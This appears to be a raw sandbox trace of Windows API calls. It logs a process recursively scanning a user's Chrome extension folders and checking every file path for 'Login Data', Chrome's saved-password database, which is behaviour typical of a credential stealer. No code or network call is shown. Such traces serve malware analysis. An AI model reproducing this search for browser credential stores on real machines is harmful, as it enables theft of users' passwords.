0x8e0000 [0161.669] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.669] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg" [0161.669] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\" [0161.669] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\") returned 138 [0161.669] lstrlenW (lpString="messages.json") returned 13 [0161.669] GetProcessHeap () returned 0x8e0000 [0161.669] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.669] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\" [0161.670] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json" [0161.670] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.670] GetProcessHeap () returned 0x8e0000 [0161.670] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.670] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\bg\\messages.json", lpSrch="Login Data") returned 0x0 [0161.670] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.670] GetProcessHeap () returned 0x8e0000 [0161.670] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.670] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x108, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.670] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.670] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.670] GetProcessHeap () returned 0x8e0000 [0161.670] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.670] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.670] GetProcessHeap () returned 0x8e0000 [0161.670] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.670] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ca", cAlternateFileName="")) returned 1 [0161.670] lstrcmpiW (lpString1="ca", lpString2=".") returned 1 [0161.670] lstrcmpiW (lpString1="ca", lpString2="..") returned 1 [0161.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.670] lstrlenW (lpString="\\") returned 1 [0161.670] GetProcessHeap () returned 0x8e0000 [0161.670] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.670] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.670] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.670] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.670] lstrlenW (lpString="ca") returned 2 [0161.670] GetProcessHeap () returned 0x8e0000 [0161.670] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.670] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.670] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" [0161.670] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.671] GetProcessHeap () returned 0x8e0000 [0161.671] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.671] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned 137 [0161.671] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned 137 [0161.671] lstrlenW (lpString="\\*.*") returned 4 [0161.671] GetProcessHeap () returned 0x8e0000 [0161.671] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.671] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" [0161.671] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*.*" [0161.671] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.672] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.672] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.672] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.672] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.672] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.672] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned 137 [0161.672] lstrlenW (lpString="\\") returned 1 [0161.672] GetProcessHeap () returned 0x8e0000 [0161.672] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca" [0161.672] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\" [0161.672] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\") returned 138 [0161.672] lstrlenW (lpString="messages.json") returned 13 [0161.672] GetProcessHeap () returned 0x8e0000 [0161.672] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.672] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\" [0161.672] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json" [0161.672] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.672] GetProcessHeap () returned 0x8e0000 [0161.672] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.672] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ca\\messages.json", lpSrch="Login Data") returned 0x0 [0161.672] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.672] GetProcessHeap () returned 0x8e0000 [0161.672] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.672] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xcf, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.673] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.673] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.673] GetProcessHeap () returned 0x8e0000 [0161.673] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.673] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.673] GetProcessHeap () returned 0x8e0000 [0161.673] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.673] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="cs", cAlternateFileName="")) returned 1 [0161.673] lstrcmpiW (lpString1="cs", lpString2=".") returned 1 [0161.673] lstrcmpiW (lpString1="cs", lpString2="..") returned 1 [0161.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.673] lstrlenW (lpString="\\") returned 1 [0161.673] GetProcessHeap () returned 0x8e0000 [0161.673] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.673] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.673] lstrlenW (lpString="cs") returned 2 [0161.673] GetProcessHeap () returned 0x8e0000 [0161.673] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.673] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" [0161.673] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.673] GetProcessHeap () returned 0x8e0000 [0161.673] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned 137 [0161.673] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned 137 [0161.673] lstrlenW (lpString="\\*.*") returned 4 [0161.673] GetProcessHeap () returned 0x8e0000 [0161.673] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.673] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs" [0161.673] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*.*" [0161.673] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\cs\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x864c72b0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x864c72b0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x864c72b0, 